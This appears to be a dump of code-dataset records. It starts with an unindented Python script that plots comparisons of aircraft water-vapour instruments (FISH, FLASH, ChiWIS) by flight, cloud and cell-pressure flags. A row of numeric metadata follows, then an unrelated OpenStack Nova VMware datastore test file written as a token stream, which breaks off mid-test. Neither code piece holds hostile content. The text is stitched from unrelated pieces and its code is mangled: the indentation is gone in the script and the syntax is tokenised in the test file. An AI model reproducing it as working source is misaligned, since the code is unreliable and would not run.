dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
dat3a = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 1)]
xa = dat3a['H2O']
ya = dat3a['FLH2O']
fia = np.array(dat3a['FLIGHT'])
ylabel = r"FLASH H$_2$O (ppmv)"
if a < 3:
ax.scatter(x,y,20,c=colors[fi-1])
axin.scatter(x,y,5,c=colors[fi-1])
if a == 2:
ax.scatter(xa,ya,50,facecolors='none',edgecolors=colors[fia-1])
axin.scatter(xa,ya,10,facecolors='none',edgecolors=colors[fia-1])
if a == 3:
dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0)]
x = dat3['FIH2O']
y = dat3['FLH2O']
vmin, vmax = 1, 100
bins = [80,80]
r = [[2,10],[2,10]]
cmin = 1e-5
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"FISH H$_2$O (ppmv)"
ylabel = r"FLASH H$_2$O (ppmv)"
if a == 4:
dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
x = dat3['H2O']
y = dat3['FLH2O']
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"ChiWIS H$_2$O (ppmv)"
ylabel = r"FLASH H$_2$O (ppmv)"
if a == 5:
dat3 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 1) & (dat['CELL_FLAG'] == 0) & (dat['F7_DIVE'] == 0)]
x = dat3['H2O']
y = dat3['FLH2O']
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
plt.colorbar(m[3], ax=ax, ticks=[vmin, 3, 30, vmax], label="counts")
xlabel = r"ChiWIS H$_2$O (ppmv)"
ylabel = r"FLASH H$_2$O (ppmv)"
if a == 0:
for fi in flno:
ax.scatter([-1],[-1],20,c=colors[fi-1], label="F"+str(fi))
if a > 2:
ax.set_xlabel(xlabel)
if a == 0 or a == 3:
ax.set_ylabel(ylabel)
ax.set_xlim([2,10])
ax.set_ylim([2,10])
ax.grid()
if a < 3:
axin.set_xticks([25,50,75]); axin.set_yticks([25,50,75])
axin.set_xlim(2,100), axin.set_ylim([2,100])
axin.grid(which='both',linestyle=':')
plt.figtext(0.33,1.06,"Clear-sky", va="center", ha="center", size=25, weight="bold")
plt.figtext(0.78,1.06,"In-cloud", va="center", ha="center", size=25, weight="bold")
plt.figtext(0.175,1.02,"FISH vs. FLASH", va="center", ha="center", size=25, weight="bold")
plt.figtext(0.48,1.02,"ChiWIS vs. FLASH", va="center", ha="center", size=25, weight="bold")
plt.figtext(0.78,1.02,"ChiWIS vs. FLASH", va="center", ha="center", size=25, weight="bold")
axused[0].legend(loc=4, ncol=3, frameon=True,
labelspacing=0.1, handletextpad=0.1, columnspacing=0.1,
borderpad = 0.2, borderaxespad = 0.4,
markerscale=2.0, fontsize=20, title_fontsize=20)
plt.savefig("./Paper-Figures/fig2-scatter-h2o-hist6.png",dpi=300,bbox_inches="tight")
plt.show()
def h2o_pt_by_pt_whist_oor(dat):
# add cloudy flag
dat['CLOUDY'] = ((dat['NICE'] > 0) | (dat['MASBR'] >= 1.2)).astype(int)
for i,f in enumerate(flno):
for lag in np.arange(1,maxlag[i]):
dat.loc[(dat['FLIGHT'] == f),'CLOUDY'] = np.maximum(dat.loc[(dat['FLIGHT'] == f),'CLOUDY'],
dat[(dat['FLIGHT'] == f)].shift(periods=lag, fill_value=0.0)['CLOUDY'])
# add ascent/descent flag
dz = (dat['ALT'] - dat.shift(periods=1)['ALT'])*1e3
dt = dat['TIME'] - dat.shift(periods=1)['TIME']
vert = np.abs(dz / dt)
vert_avg = vert.rolling(window=20).mean()
dat['ASCENT_FLAG'] = ((vert_avg > 10) | (dat['ALT'] < 12)).astype(int)
# add chiwis flag
dat['CELL_GOOD'] = ((dat['PRES_CELL'] > 30.0) & (dat['PRES_CELL'] < 45.0) & (dat['FLAG'] == 0)).astype(int)
dat['CELL_LOW'] = ((dat['PRES_CELL'] > 20.0) & (dat['PRES_CELL'] < 30.0) & (dat['FLAG'] == 0)).astype(int)
# FL7 dive flag
dat['F7_DIVE'] = ((dat['FLIGHT'] == 7) & (dat['TIME'] > 19.9e3) & (dat['TIME'] < 20.2e3)).astype('int')
fig,axes = plt.subplots(figsize=(13,9),ncols=2,nrows=2,constrained_layout=True)
plt.rcParams.update({"font.size":22})
axused = axes.flatten()
for a,ax in enumerate(axused):
if a < 2:
axin = ax.inset_axes([2,7,3,3], transform=ax.transData)
axin.yaxis.set_label_position("right")
axin.yaxis.tick_right()
axin.plot([2,100],[2,100],"k-")
# plot diagonal lines
ax.plot([2,10],[2,10],"k-")
if a > -1:
ax.plot([0,12],[0,12*1.1],"k--")
ax.plot([0,12],[0,12*0.9],"k--")
ax.plot([0,12],[0,12*1.2],"k:")
ax.plot([0,12],[0,12*0.8],"k:")
# regression
for i,h2ocut in enumerate([100,10]):
datx = dat[(dat['ASCENT_FLAG'] == 0) & (dat['FLH2O'] <= h2ocut)]
if a == 0:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_GOOD'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "a"
if a == 1:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_LOW'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "b"
if a == 2:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_GOOD'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "c"
if a == 3:
dat1 = datx[(datx['CLOUDY'] == 0) & (datx['CELL_LOW'] == 1) & (datx['H2O'] <= h2ocut)]
x = dat1['H2O']
y = dat1['FLH2O']
title = "d"
mask = ~np.isnan(x) & ~np.isnan(y)
slope, intercept, rvalue, pvalue, se = stats.linregress(x[mask],y[mask])
bias = (x[mask] - y[mask]) / y[mask]
meanbias = np.mean(bias) * 100.0
if a < 2:
print(title)
print(h2ocut, a, "r2=",rvalue**2)
print("mean bias = ", meanbias, "%")
ax.set_title(title,weight="bold",loc="left")
if a < 2:
ax.set_title("bias={:.2f}%, $r^2=${:.3f}".format(meanbias, rvalue**2),loc="right",fontsize=20)
else:
ax.text(7.5,2.2,"N={}".format(len(x[mask])))
# plot
if a == 0:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_GOOD'] == 1)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ylabel = r"clear-sky FLASH H$_2$O"
ax.text(3, 11.2, "cell pressure$\geq 30$mbar")
if a == 1:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_LOW'] == 1)]
x = np.array(dat1['H2O'])
y = np.array(dat1['FLH2O'])
fi = np.array(dat1['FLIGHT'])
p = np.random.permutation(len(x))
x, y, fi = x[p], y[p], fi[p]
ax.text(2.5, 11.2, "$20 \leq$cell pressure$\leq 30$mbar")
if a < 2:
ax.scatter(x,y,20,c=colors[fi-1])
axin.scatter(x,y,5,c=colors[fi-1])
if a == 2:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_GOOD'] == 1)]
x = dat1['H2O']
y = dat1['FLH2O']
vmin, vmax = 1, 100
bins = [80,80]
r = [[2,10],[2,10]]
cmin = 1e-5
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"clear-sky ChiWIS H$_2$O"
ylabel = r"clear-sky FLASH H$_2$O"
if a == 3:
dat1 = dat[(dat['ASCENT_FLAG'] == 0) & (dat['CLOUDY'] == 0) & (dat['CELL_LOW'] == 1)]
x = dat1['H2O']
y = dat1['FLH2O']
m = ax.hist2d(x,y,bins=bins,range=r,
cmap=cmap,norm=mcolors.PowerNorm(gamma=0.3),
vmin=vmin,vmax=vmax,cmin=cmin)
xlabel = r"clear-sky ChiWIS H$_2$O"
plt.colorbar(m[3], ax=ax, ticks=[vmin, 3, 30, vmax], label="counts")
if a == 0:
for fi in flno:
ax.scatter([-1],[-1],20,c=colors[fi-1], label="F"+str(fi))
ax.set_xlim([2,10])
ax.set_ylim([2,10])
ax.grid()
if a < 3:
axin.set_xticks([25,50,75]); axin.set_yticks([25,50,75])
axin.set_xlim(2,100), axin.set_ylim([2,100])
axin.grid(which='both',linestyle=':')
axused[0].legend(loc=4, ncol=3, frameon=True,
labelspacing=0.1, handletextpad=0.1, columnspacing=0.1,
borderpad = 0.2, borderaxespad = 0.4,
markerscale=2.0, fontsize=20, title_fontsize=20)
fig.text(0.48, -0.05, r"clear-sky ChiWIS H$_2$O (ppmv)", ha='center')
fig.text(-0.05, 0.5, r"clear-sky FLASH H$_2$O (ppmv)", va='center', rotation='vertical')
plt.rcParams.update({"font.size":22})
plt.savefig("./Paper-Figures/supp-scatter-h2o-hist-oor.png",dpi=300,bbox_inches="tight")
plt.show() | 42 | 128 | 0.451307 | 2,151 | 15,834 | 3.270572 | 0.122269 | 0.015778 | 0.019332 | 0.029566 | 0.880028 | 0.870362 | 0.85231 | 0.843923 | 0.828998 | 0.820611 | 0 | 0.076997 | 0.347101 | 15,834 | 377 | 129 | 42 | 0.603502 | 0.013326 | 0 | 0.794788 | 0 | 0 | 0.12512 | 0.005574 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006515 | false | 0 | 0.022801 | 0 | 0.029316 | 0.029316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
289f9c4f8f15d130c7f5f900bed324dcfd164bd7 | 44,980 | py | Python | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/virt/vmwareapi/test_ds_util.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2014 VMware, Inc.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'re'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'units'
newline|'\n'
name|'from'
name|'oslo_vmware'
name|'import'
name|'exceptions'
name|'as'
name|'vexc'
newline|'\n'
name|'from'
name|'oslo_vmware'
op|'.'
name|'objects'
name|'import'
name|'datastore'
name|'as'
name|'ds_obj'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'fake'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'vmwareapi'
name|'import'
name|'ds_util'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|DsUtilTestCase
name|'class'
name|'DsUtilTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DsUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'session'
op|'='
name|'fake'
op|'.'
name|'FakeSession'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'api_retry_count'
op|'='
number|'1'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|tearDown
dedent|''
name|'def'
name|'tearDown'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'DsUtilTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'tearDown'
op|'('
op|')'
newline|'\n'
name|'fake'
op|'.'
name|'reset'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datacenter_ref
dedent|''
name|'def'
name|'test_get_datacenter_ref'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|')'
name|'as'
name|'call_method'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'get_datacenter_ref'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|'"datacenter"'
op|')'
newline|'\n'
name|'call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'.'
name|'vim'
op|','
nl|'\n'
string|'"FindByInventoryPath"'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|'.'
name|'vim'
op|'.'
name|'service_content'
op|'.'
name|'searchIndex'
op|','
nl|'\n'
name|'inventoryPath'
op|'='
string|'"datacenter"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_delete
dedent|''
dedent|''
name|'def'
name|'test_file_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'DeleteDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'name'
op|')'
newline|'\n'
name|'datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'datacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_delete_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_delete'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'ds_path'
op|','
string|"'fake-dc-ref'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_delete_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_copy
dedent|''
dedent|''
name|'def'
name|'test_file_copy'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'CopyDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'src_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path/src_file'"
op|','
name|'src_name'
op|')'
newline|'\n'
name|'src_dc_ref'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-src-dc-ref'"
op|','
name|'src_dc_ref'
op|')'
newline|'\n'
name|'dst_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path/dst_file'"
op|','
name|'dst_name'
op|')'
newline|'\n'
name|'dst_dc_ref'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dst-dc-ref'"
op|','
name|'dst_dc_ref'
op|')'
newline|'\n'
name|'return'
string|"'fake_copy_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'src_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|','
string|"'src_file'"
op|')'
newline|'\n'
name|'dst_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|','
string|"'dst_file'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_copy'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
name|'str'
op|'('
name|'src_ds_path'
op|')'
op|','
string|"'fake-src-dc-ref'"
op|','
nl|'\n'
name|'str'
op|'('
name|'dst_ds_path'
op|')'
op|','
string|"'fake-dst-dc-ref'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_copy_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_move
dedent|''
dedent|''
name|'def'
name|'test_file_move'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'MoveDatastoreFile_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'sourceName'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] tmp/src'"
op|','
name|'sourceName'
op|')'
newline|'\n'
name|'destinationName'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] base/dst'"
op|','
name|'destinationName'
op|')'
newline|'\n'
name|'sourceDatacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'sourceDatacenter'
op|')'
newline|'\n'
name|'destinationDatacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destinationDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'destinationDatacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_move_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'src_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'tmp/src'"
op|')'
newline|'\n'
name|'dst_ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'base/dst'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'file_move'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
name|'src_ds_path'
op|','
name|'dst_ds_path'
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_move_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_move
dedent|''
dedent|''
name|'def'
name|'test_disk_move'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'MoveVirtualDisk_Task'"
op|','
name|'method'
op|')'
newline|'\n'
name|'src_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] tmp/src'"
op|','
name|'src_name'
op|')'
newline|'\n'
name|'dest_name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destName'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] base/dst'"
op|','
name|'dest_name'
op|')'
newline|'\n'
name|'src_datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'sourceDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'src_datacenter'
op|')'
newline|'\n'
name|'dest_datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'destDatacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'dest_datacenter'
op|')'
newline|'\n'
name|'return'
string|"'fake_move_task'"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'disk_move'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
string|"'[ds] tmp/src'"
op|','
string|"'[ds] base/dst'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_has_calls'
op|'('
op|'['
nl|'\n'
name|'mock'
op|'.'
name|'call'
op|'('
string|"'fake_move_task'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_copy
dedent|''
dedent|''
name|'def'
name|'test_disk_copy'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'disk_copy'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'source_ds'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dest_ds'
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'CopyVirtualDisk_Task'"
op|','
string|"'VirtualDiskManager'"
op|','
nl|'\n'
name|'sourceName'
op|'='
string|"'sentinel.source_ds'"
op|','
nl|'\n'
name|'destDatacenter'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
nl|'\n'
name|'sourceDatacenter'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'dc_ref'
op|','
name|'force'
op|'='
name|'False'
op|','
nl|'\n'
name|'destName'
op|'='
string|"'sentinel.dest_ds'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_disk_delete
dedent|''
dedent|''
name|'def'
name|'test_disk_delete'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
nl|'\n'
op|')'
name|'as'
op|'('
name|'_wait_for_task'
op|','
name|'_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
